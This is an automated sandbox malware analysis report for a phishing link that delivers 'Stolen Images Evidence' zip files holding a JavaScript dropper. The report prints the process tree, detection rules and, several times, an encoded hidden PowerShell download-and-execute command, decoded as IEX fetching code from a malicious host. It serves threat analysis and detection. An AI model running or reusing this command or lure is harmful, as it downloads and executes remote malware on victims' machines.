Windows Analysis Report https://storage.googleapis.com/m4b38h10cm38.appspot.com/d/file/0/public/a/3fdjn39fduh3nfdfn.html?l=048464344988443721#

Overview

General Information

Sample URL: https://storage.googleapis.com/m4b38h10cm38.appspot.com/d/file/0/public/a/3fdjn39fduh3nfdfn.html?l=048464344988443721#
Analysis ID: 505091

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Antivirus detection for URL or domain
Yara detected Powershell download and execute
Sigma detected: Suspicious Script Execution From Temp Folder
Writes to foreign memory regions
PowerShell case anomaly found
Wscript starts Powershell (via cmd or directly)
Sigma detected: Suspicious Encoded PowerShell Command Line
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Suspicious powershell command line found
Sigma detected: Suspicious PowerShell Invocations - Specific
Sigma detected: WScript or CScript Dropper
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution
Detected potential crypto function
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 4724 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'https://storage.googleapis.com/m4b38h10cm38.appspot.com/d/file/0/public/a/3fdjn39fduh3nfdfn.html?l=048464344988443721#' MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 2876 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,11587432688044278777,2975671469201023268,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 7012 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1556,11587432688044278777,2975671469201023268,131072 --lang=en-US --service-sandbox-type=none --enable-audio-service-sandbox --mojo-platform-channel-handle=5896 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • unarchiver.exe (PID: 6684 cmdline: 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\Downloads\Stolen Images Evidence.zip' MD5: DB55139D9DD29F24AE8EA8F0E5606901)
      • 7za.exe (PID: 6068 cmdline: 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd' 'C:\Users\user\Downloads\Stolen Images Evidence.zip' MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6380 cmdline: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 6820 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 5400 cmdline: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 5648 cmdline: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • chrome.exe (PID: 6388 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1556,11587432688044278777,2975671469201023268,131072 --lang=en-US --service-sandbox-type=none --enable-audio-service-sandbox --mojo-platform-channel-handle=4628 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • unarchiver.exe (PID: 5892 cmdline: 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\Downloads\Stolen Images Evidence (1).zip' MD5: DB55139D9DD29F24AE8EA8F0E5606901)
      • 7za.exe (PID: 3060 cmdline: 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\wx0c5czs.h3n' 'C:\Users\user\Downloads\Stolen Images Evidence (1).zip' MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1412 cmdline: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\wx0c5czs.h3n\Stolen Images Evidence.js' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 6888 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wx0c5czs.h3n\Stolen Images Evidence.js' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 1324 cmdline: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 6268 cmdline: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • chrome.exe (PID: 6692 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1556,11587432688044278777,2975671469201023268,131072 --lang=en-US --service-sandbox-type=none --enable-audio-service-sandbox --mojo-platform-channel-handle=3644 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • unarchiver.exe (PID: 1456 cmdline: 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\Downloads\Stolen Images Evidence (2).zip' MD5: DB55139D9DD29F24AE8EA8F0E5606901)
      • 7za.exe (PID: 6252 cmdline: 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\s4fhf54g.u35' 'C:\Users\user\Downloads\Stolen Images Evidence (2).zip' MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3540 cmdline: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\s4fhf54g.u35\Stolen Images Evidence.js' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 4840 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\s4fhf54g.u35\Stolen Images Evidence.js' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6420 cmdline: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 6208 cmdline: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\20211018\PowerShell_transcript.610930.3wwpsSEZ.20211018224633.txt | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
  • 0x123:$sa1: -enc
  • 0x50a:$sa1: -enc
  • 0x10e:$sb1: -w hidden
  • 0x4f5:$sb1: -w hidden
  • 0x109:$sc1: -nop
  • 0x4f0:$sc1: -nop
  • 0x118:$se1: -ep bypass
  • 0x4ff:$se1: -ep bypass
C:\Users\user\Documents\20211018\PowerShell_transcript.610930.3wwpsSEZ.20211018224633.txt | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\Documents\20211018\PowerShell_transcript.610930.OeKRHfkQ.20211018224629.txt | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
  • 0x123:$sa1: -enc
  • 0x50a:$sa1: -enc
  • 0x10e:$sb1: -w hidden
  • 0x4f5:$sb1: -w hidden
  • 0x109:$sc1: -nop
  • 0x4f0:$sc1: -nop
  • 0x118:$se1: -ep bypass
  • 0x4ff:$se1: -ep bypass
C:\Users\user\Documents\20211018\PowerShell_transcript.610930.OeKRHfkQ.20211018224629.txt | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
C:\Users\user\Documents\20211018\PowerShell_transcript.610930.D04HlV6H.20211018224618.txt | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
  • 0x123:$sa1: -enc
  • 0x50a:$sa1: -enc
  • 0x10e:$sb1: -w hidden
  • 0x4f5:$sb1: -w hidden
  • 0x109:$sc1: -nop
  • 0x4f0:$sc1: -nop
  • 0x118:$se1: -ep bypass
  • 0x4ff:$se1: -ep bypass

Memory Dumps

Source | Rule | Description | Author | Strings
00000021.00000003.338953199.00000000058D7000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x2b06:$s1: poWERshEll
  • 0x2dd4:$s1: poWERshEll
00000025.00000003.353205195.000000000356D000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x883c:$s1: poWERshEll
00000025.00000003.354211813.0000000003571000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x483c:$s1: poWERshEll
0000001B.00000003.319065824.0000000004C08000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x1b06:$s1: poWERshEll
  • 0x1dd4:$s1: poWERshEll
0000001E.00000002.430635881.00000000051CE000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x1980:$s1: poWERshEll
  • 0x26be:$s1: poWERshEll
  • 0x321e:$s1: poWERshEll
  • 0x3a68:$s1: poWERshEll
  • 0x3d04:$s1: poWERshEll

Sigma Overview

System Summary:

Sigma detected: Suspicious Script Execution From Temp Folder
Source: Process started | Author: Florian Roth, Max Altgelt | Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine|base64offset|contains: "fz, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6380, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , ProcessId: 6820
Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community | Data: Command: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, CommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6820, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, ProcessId: 5400
Sigma detected: Suspicious PowerShell Invocations - Specific
Source: Event Logs | Author: Florian Roth (rule), Jonhnathan Ribeiro | Data: EventID: 4104, Source: Microsoft-Windows-PowerShell, data 0: 1, data 1: 1, data 2: IEX (New-Object Net.Webclient).downloadstring("http://moseronado.top/333g100/index.php"), data 3: 71efb089-49b8-4249-8e3b-5d497e16e95c, data 4:
Sigma detected: WScript or CScript Dropper
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community | Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine|base64offset|contains: "fz, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6380, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , ProcessId: 6820
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution
Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine|base64offset|contains: "fz, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6380, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , ProcessId: 6820
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, CommandLine: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, CommandLine|base64offset|contains: FD, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5400, ProcessCommandLine: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, ProcessId: 5648
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132790959761494919.5648.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://moseronado.top/ | Avira URL Cloud: Label: malware
Source: http://moseronado.top | Avira URL Cloud: Label: malware
Source: http://moseronado.top/333g100/index.php | Avira URL Cloud: Label: malware
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Local\Temp\4724_1438030691\LICENSE.txt
Source: C:\Windows\SysWOW64\unarchiver.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb4C | source: powershell.exe, 0000001E.00000002.425859097.0000000002DB7000.00000004.00000020.sdmp
Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 02CC099Bh | 7_2_02CC02A8
Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 02CC099Ah | 7_2_02CC02A8
Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 0520099Bh | 14_2_052002A8
Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 0520099Ah | 14_2_052002A8
Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 02CF099Bh | 22_2_02CF02A8
Source: C:\Windows\SysWOW64\unarchiver.exe | Code function: 4x nop then jmp 02CF099Ah | 22_2_02CF02A8